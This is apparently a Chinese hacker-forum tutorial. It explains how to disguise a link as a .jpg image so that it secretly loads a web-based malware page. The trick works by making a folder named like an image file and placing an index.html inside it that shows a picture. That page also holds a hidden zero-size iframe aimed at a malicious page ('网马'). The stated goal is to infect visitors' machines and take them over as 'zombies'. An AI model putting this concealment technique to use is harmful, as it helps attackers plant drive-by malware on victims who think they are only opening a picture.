摘自:Solar-fly [S.N.T]
在我还不知道灰鸽子是什么的时候,网马就很流行了,当我终于知道灰鸽子是什么的时候,盗QQ软件都在使用邮箱收信了,当我使用灰鸽子成功上线并抓到第一只肉鸡的时候,网马批量抓肉鸡就都已经满天飞了……难道我学的技术都过时了吗?后来当我成为大鸟的时候我终于想通了这个道理:“没有过时的技术,只有过时的思想”!
下面就请看我如何利用过时的方法来体现出技术的价值。我所需要的只是一张图片和一个web环境而已。
首先,搭建一个web环境,我使用的是小旋风ASP服务器,感觉这个比较方便,操作也简单,不像IIS那样又要用光盘又要重启的。打开安装程序,如图1,基本上一路点击“下一步”就可以了,它的默认安装路径是“C:\Program Files\小旋风AspWebServer”,安装完成后,如果我们在IE浏览器中打开127.0.0.1出现了如图2所示的这样一个页面就说明环境已经搭建好了。
接下来在小旋风的根目录下新建一个以.jpg结尾的文件夹,比如snight.jpg,如图3,然后在snight.jpg文件夹下再新建一个index.html的网页文件。我们重新使用IE浏览器访问一下
http://127.0.0.1/snight.jpg看看,发现了什么没有?如图4。
现在大家应该想到了什么吧,我们再向index.html里添加一张图片,代码是<img src=”1.jpg”></img>,如图5。重新打开这个链接
http://127.0.0.1/snight.jpg,看到图片了吧,如图6。
要是这样也没什么利用价值,那我们接下来就把挂马的地址也添加进去,代码就是<iframe src=”网马地址”height=0 width=0></iframe>,如图7。现在就行了,点击你的“图片”地址,这时你一定要注意网页的左下角的变化,如图8。
看到了吗?跳转目录,再跳转文件,再打开网页,最后只显示图片。这时你应该明白了吧,就是利用Html里默认的优先级关系来达到我们隐蔽挂马的目的。
这也算是图片欺骗的一种方法吧,本文我只是给大家做了个简单的小例子,使用的也是最简单的框架挂马。具体还可以用在哪个地方就请大家自由发挥吧,总之还是哪句话:“刀可以杀人,亦可以救人”,道理都是一样的。